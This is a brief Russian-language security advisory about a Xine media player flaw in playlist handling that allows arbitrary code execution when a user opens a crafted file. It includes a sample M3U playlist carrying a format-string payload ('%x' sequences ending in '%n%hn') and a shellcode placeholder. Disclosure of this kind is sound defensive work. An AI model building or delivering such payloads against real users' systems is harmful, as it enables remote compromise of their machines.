Программа: Xine
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в обработке злонамеренных списков музыкальных файлов. Атакующий может обманным образом заставить пользователя открыть специально составленные файлы, что приведет к выполнению произвольного кода.
Пример:
#EXTM3U
#EXTINFO !!All_You_Playlists_Are_Belong_To_Us - SHHEEEELLLLCCCCOOOOOODDDDDDEEEEEEEEEEE!!
AAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%.13068u%n%hn